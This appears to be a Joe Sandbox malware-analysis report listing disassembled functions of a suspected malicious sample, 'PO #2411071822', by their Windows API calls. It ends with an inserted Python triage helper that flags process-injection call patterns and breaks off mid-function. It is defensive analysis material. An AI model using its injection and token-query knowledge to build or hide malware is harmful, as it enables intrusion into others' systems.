                                                                                                              • Instruction ID: f7946af6d1eeed4f354f612b630eba5e535f794265d9a05b457fc778d07d755c
                                                                                                              • Opcode Fuzzy Hash: c0372414f149803f32240315a2fcebb165a44e7264ebc7679dbf5dc7f7f45936
                                                                                                              • Instruction Fuzzy Hash: 95219F35B00214AFD700DFA5DD84AAEBBE5EF48305F048879E94A9B251DA74AC00CBA4
                                                                                                              APIs
                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FAFF2
                                                                                                              • BeginPath.GDI32(?), ref: 003FB009
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FB033
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                              • String ID:
                                                                                                              • API String ID: 3225163088-0
                                                                                                              • Opcode ID: b3a56ee355c72ce00df717a1c1c3111fca163dd3f52fdc6bb1040054d6cab0b0
                                                                                                              • Instruction ID: 2e3f19e9d2af2d223a671ab901c1d00f6bbf8d3de42700cad5d6ef2225ed5562
                                                                                                              • Opcode Fuzzy Hash: b3a56ee355c72ce00df717a1c1c3111fca163dd3f52fdc6bb1040054d6cab0b0
                                                                                                              • Instruction Fuzzy Hash: C021A1B0900309EFDB119F55EC847AE7F68B712355F18423AF525D61F0D7B04945CB99
                                                                                                              APIs
                                                                                                              • __calloc_crt.LIBCMT ref: 004021A9
                                                                                                              • CreateThread.KERNEL32(?,?,004022DF,00000000,?,?), ref: 004021ED
                                                                                                              • GetLastError.KERNEL32 ref: 004021F7
                                                                                                              • _free.LIBCMT ref: 00402200
                                                                                                              • __dosmaperr.LIBCMT ref: 0040220B
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2664167353-0
                                                                                                              • Opcode ID: 1b8125957ec3fe480c03855b9e0473d7861805bd333e0b49e6989315e44a8139
                                                                                                              • Instruction ID: 41af6ac61813a2dc935315f80a6ef60154cfbc4965516c3b81c51833fb5eade2
                                                                                                              • Opcode Fuzzy Hash: 1b8125957ec3fe480c03855b9e0473d7861805bd333e0b49e6989315e44a8139
                                                                                                              • Instruction Fuzzy Hash: 4C1129326043066FD710AFE6DD45D5B3798EF44724710003FF914B62C1EBB9D8118AA9
                                                                                                              APIs
                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                              • GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 842720411-0
                                                                                                              • Opcode ID: 53794ca6fd7fc95164c781fab23b6a1c4952e1eb48662911b2dd56e6acb5073f
                                                                                                              • Instruction ID: 2b9debebed50b4b2f937d6877789bbd24676c7d506f4d68f058fb2a52a55ea27
                                                                                                              • Opcode Fuzzy Hash: 53794ca6fd7fc95164c781fab23b6a1c4952e1eb48662911b2dd56e6acb5073f
                                                                                                              • Instruction Fuzzy Hash: 8E011D71B01205BFDB114FA5DC48DAB3BADEF8A755710042AF945C7250E7B19C90CBA9
                                                                                                              APIs
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427A74
                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00427A82
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00427A8A
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00427A94
                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                              • String ID:
                                                                                                              • API String ID: 2833360925-0
                                                                                                              • Opcode ID: 206777b134126ee01cce4645fc4487ddf17220bd3b6efd04a0d8276e24df5263
                                                                                                              • Instruction ID: b5b2c97fdb7ea30fbdea88ad75dd609e54fedb3fe370ff07ff96f059694d8ba5
                                                                                                              • Opcode Fuzzy Hash: 206777b134126ee01cce4645fc4487ddf17220bd3b6efd04a0d8276e24df5263
                                                                                                              • Instruction Fuzzy Hash: B7018431E04629DBCF009FE5EC499DDBB78FF09311F404056D501B2150DBB49650C76A
                                                                                                              APIs
                                                                                                              • CLSIDFromProgID.OLE32 ref: 00419ADC
                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00419AF7
                                                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00419B05
                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00419B15
                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00419B21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 3897988419-0
                                                                                                              • Opcode ID: a205420c72f7dfb33ca07129a002d52056e29927d6c83fe6036500350673f708
                                                                                                              • Instruction ID: 03e287a5ec78a91ed23f03fa94e8d314087521373a00f985898a82c2fc4b6b40
                                                                                                              • Opcode Fuzzy Hash: a205420c72f7dfb33ca07129a002d52056e29927d6c83fe6036500350673f708
                                                                                                              • Instruction Fuzzy Hash: 93017C76B00205ABDB105F54EC58A9A7BEDEB48391F144035F905D2210E7B4ED809BA5
                                                                                                              APIs
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0041AA79
                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0041AA83
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0041AA92
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0041AA99
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0041AAAF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 44706859-0
                                                                                                              • Opcode ID: 80851c9f69c9d5ad4b0c7c08942f2f2121ca78fa2df3039bee9379a1c228660b
                                                                                                              • Instruction ID: 4abd401844dc5f5b32405f7aa9716bdf088bd7888b30aabc41f1ff00975613a8
                                                                                                              • Opcode Fuzzy Hash: 80851c9f69c9d5ad4b0c7c08942f2f2121ca78fa2df3039bee9379a1c228660b
                                                                                                              • Instruction Fuzzy Hash: BEF044717012046FD7115FA59C89EB73B6CFF4A754F00042AF941C7250E6A59C55CA6A
                                                                                                              APIs
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 0041AADA
                                                                                                              • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 0041AAE4
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 0041AAF3
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 0041AAFA
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 0041AB10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 44706859-0
                                                                                                              • Opcode ID: 7ede8eb2e020f0cad925534e3c860a6211e1fd7be741012e9f96273a738e2266
                                                                                                              • Instruction ID: 5e449d38c4e527afe4263606f8950d667af57fe8b2f3f8f15066ab18deb32ff2
                                                                                                              • Opcode Fuzzy Hash: 7ede8eb2e020f0cad925534e3c860a6211e1fd7be741012e9f96273a738e2266
                                                                                                              • Instruction Fuzzy Hash: 9DF044717052446FDB111FA5EC88EA73B6DFF4A754F00003AFA41C7250D7A5AC558A66
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041EC94
                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041ECAB
                                                                                                              • MessageBeep.USER32(00000000), ref: 0041ECC3
                                                                                                              • KillTimer.USER32(?,0000040A), ref: 0041ECDF
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0041ECF9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3741023627-0
                                                                                                              • Opcode ID: 19d4c82884588776d24728f27ceebb42f865547b3e9803d6b4d3b077ad436511
                                                                                                              • Instruction ID: 61961fc8cab5d656090f99bed623bcff0938e459669e3d625af0869e4dd1b739
                                                                                                              • Opcode Fuzzy Hash: 19d4c82884588776d24728f27ceebb42f865547b3e9803d6b4d3b077ad436511
                                                                                                              • Instruction Fuzzy Hash: 28016234E00715ABEB255B12DE4EBD67778BB10705F00056AE943624E0FBF4A9848B8A
                                                                                                              APIs
                                                                                                              • EndPath.GDI32(?), ref: 003FB0BA
                                                                                                              • StrokeAndFillPath.GDI32(?,?,0045E680,00000000,?,?,?), ref: 003FB0D6
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FB0E9
                                                                                                              • DeleteObject.GDI32 ref: 003FB0FC
                                                                                                              • StrokePath.GDI32(?), ref: 003FB117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                              • String ID:
                                                                                                              • API String ID: 2625713937-0
                                                                                                              • Opcode ID: ee7176060dba981dc77ce1911aa1ce8e6fecf76b4f1d5ea9bcee5e7acba11cfa
                                                                                                              • Instruction ID: b623d0799e273dd39fdba49dfa3d3cdaeb4f56bdfda32d832c9e004f6ba0dba9
                                                                                                              • Opcode Fuzzy Hash: ee7176060dba981dc77ce1911aa1ce8e6fecf76b4f1d5ea9bcee5e7acba11cfa
                                                                                                              • Instruction Fuzzy Hash: DAF04F74500608EFCB229F65EC0C7A83F64A7123A6F088335F525840F0DB708966CF19
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0042F2DA
                                                                                                              • CoCreateInstance.OLE32(0046DA7C,00000000,00000001,0046D8EC,?), ref: 0042F2F2
                                                                                                              • CoUninitialize.OLE32 ref: 0042F555
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                              • String ID: .lnk
                                                                                                              • API String ID: 948891078-24824748
                                                                                                              • Opcode ID: 888e1163181715a164d29ea5c178992bff970b88ad55d2a22c2d9f6bec221615
                                                                                                              • Instruction ID: c352bfffa4a30c5e6827837f1b14cc8ad54894080d584e89ac6da3dde9ec205f
                                                                                                              • Opcode Fuzzy Hash: 888e1163181715a164d29ea5c178992bff970b88ad55d2a22c2d9f6bec221615
                                                                                                              • Instruction Fuzzy Hash: 58A13D71604205AFD301EF64C881EAFB7ECEF98714F404A2DF5559B192EBB0EA49CB52
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0042E85D
                                                                                                              • CoCreateInstance.OLE32(0046DA7C,00000000,00000001,0046D8EC,?), ref: 0042E876
                                                                                                              • CoUninitialize.OLE32 ref: 0042E893
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                              • String ID: .lnk
                                                                                                              • API String ID: 2126378814-24824748
                                                                                                              • Opcode ID: 3ad82830a021835b8f988bc07a228053e253193b7a1bc6bc69cf01bcc4f33cb5
                                                                                                              • Instruction ID: f8afe9f7cd7fda37961bd7ce269b59fea1344992144c07011bf5dfb3ac97f419
                                                                                                              • Opcode Fuzzy Hash: 3ad82830a021835b8f988bc07a228053e253193b7a1bc6bc69cf01bcc4f33cb5
                                                                                                              • Instruction Fuzzy Hash: 36A165756043219FCB10EF15C484A2EBBE5BF88310F148A5AF9969B3A2CB35EC45CB95
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004032ED
                                                                                                                • Part of subcall function 0040E0D0: __87except.LIBCMT ref: 0040E10B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__87except__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 2905807303-2276729525
                                                                                                              • Opcode ID: b15c826dd7cfc29fc9a49586aef0e662782d8765c0175a921ffad6f75cfed260
                                                                                                              • Instruction ID: 1434e947ae8ee2ce4509a02eb0f465a349535b6b3e9387f6a93a419d0ad6be9b
                                                                                                              • Opcode Fuzzy Hash: b15c826dd7cfc29fc9a49586aef0e662782d8765c0175a921ffad6f75cfed260
                                                                                                              • Instruction Fuzzy Hash: D7515571A0820196CB15BB16C94137B2F989B40711F248DBFE8C5A63E9DE7C8AE4964E
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0047DC50,?,0000000F,0000000C,00000016,0047DC50,?), ref: 00424645
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004246C5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                                                              • String ID: REMOVE$THIS
                                                                                                              • API String ID: 3797816924-776492005
                                                                                                              • Opcode ID: 497dd3d0aa1ffac21a1dec135597d8897ce7d1378edf96cb6127dd0b5a30f71f
                                                                                                              • Instruction ID: a16632e69f1fcafd3a74a1f566753599876c462ec807146710935cc58e54ec16
                                                                                                              • Opcode Fuzzy Hash: 497dd3d0aa1ffac21a1dec135597d8897ce7d1378edf96cb6127dd0b5a30f71f
                                                                                                              • Instruction Fuzzy Hash: A441D634B002699FCF01EF55D881AAEB7B4FF85304F14806AE916AB392DB38DD41CB45
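                                                                                                              Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage helper for function listings of the form shown on this page. It parses the API call lines of a block, including the indented "Part of subcall function" lines, decodes the GetTokenInformation class argument with the winnt.h enumeration (TokenUser is 1, so 2 is TokenGroups, 3 is TokenPrivileges and TokenIntegrityLevel is 25), decodes the OpenProcess access mask (0x438 requests PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE and PROCESS_QUERY_INFORMATION), and flags a block whose direct and subcall APIs together form the OpenProcess + VirtualAllocEx + WriteProcessMemory cross-process write primitive, as in the SendMessageW block at 0041C1D3 that follows. The SendMessageW ids are decoded as tree-view messages on the stated assumption that the target window is a SysTreeView32; the listing does not show the window class. The two sample listings are constructed from lines of this report with the sandbox's decoded labels removed; the function and variable names are the example's own.

```python
"""Triage helper for Joe Sandbox function listings (added example, not sandbox code).

Parses '• Api.DLL(arg,...), ref: ADDR' lines of one function block, decodes a few
constants with values from the Windows SDK headers, and flags blocks that carry the
complete cross-process write primitive (OpenProcess + VirtualAllocEx + WriteProcessMemory).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# winnt.h TOKEN_INFORMATION_CLASS: TokenUser is 1 and the values count up from there,
# so 3 is TokenPrivileges and TokenIntegrityLevel is 25 (subset listed).
TOKEN_INFORMATION_CLASS = {
    1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
    18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel",
}
# commctrl.h tree-view messages (TV_FIRST = 0x1100).  Decoding a SendMessageW id this way
# ASSUMES the target is a SysTreeView32; the sandbox listing does not show the window class.
TV_FIRST = 0x1100
TREEVIEW_MESSAGES = {
    TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 5: "TVM_GETCOUNT",
    TV_FIRST + 10: "TVM_GETNEXTITEM", TV_FIRST + 11: "TVM_SELECTITEM",
    TV_FIRST + 17: "TVM_HITTEST", TV_FIRST + 62: "TVM_GETITEMW",
}
# winnt.h process access rights (subset).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
}
CROSS_PROCESS_WRITE = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"}

# One call line: optional subcall prefix, Api.DLL, optional (args), then ', ref: ADDR'.
CALL_RE = re.compile(
    r"(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)"
)

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    api: str
    dll: str
    args: List[Arg]            # int for a hex value, str for a propagated label, None for '?'
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the line is a 'Part of subcall' entry


def _parse_arg(raw: str) -> Arg:
    raw = re.sub(r"\(.*?\)", "", raw).strip()   # drop decoded labels such as '(TokenGroups)'
    if not raw or raw == "?":
        return None
    try:
        return int(raw, 16)
    except ValueError:
        return raw                                # keep a non-numeric label verbatim


def parse_calls(listing: str) -> List[ApiCall]:
    """Return the API calls of one function block, in listing order."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue                              # 'APIs', 'Strings', dump-source lines
        sub, api, dll, raw_args, ref = m.groups()
        args = [_parse_arg(a) for a in raw_args.split(",")] if raw_args is not None else []
        calls.append(ApiCall(api, dll, args, int(ref, 16), int(sub, 16) if sub else None))
    return calls


def decode(call: ApiCall) -> str:
    """Symbolic name of the constant argument this triage cares about, or '' if none."""
    if call.api == "GetTokenInformation" and len(call.args) > 1 and isinstance(call.args[1], int):
        return TOKEN_INFORMATION_CLASS.get(call.args[1], f"TOKEN_INFORMATION_CLASS {call.args[1]}")
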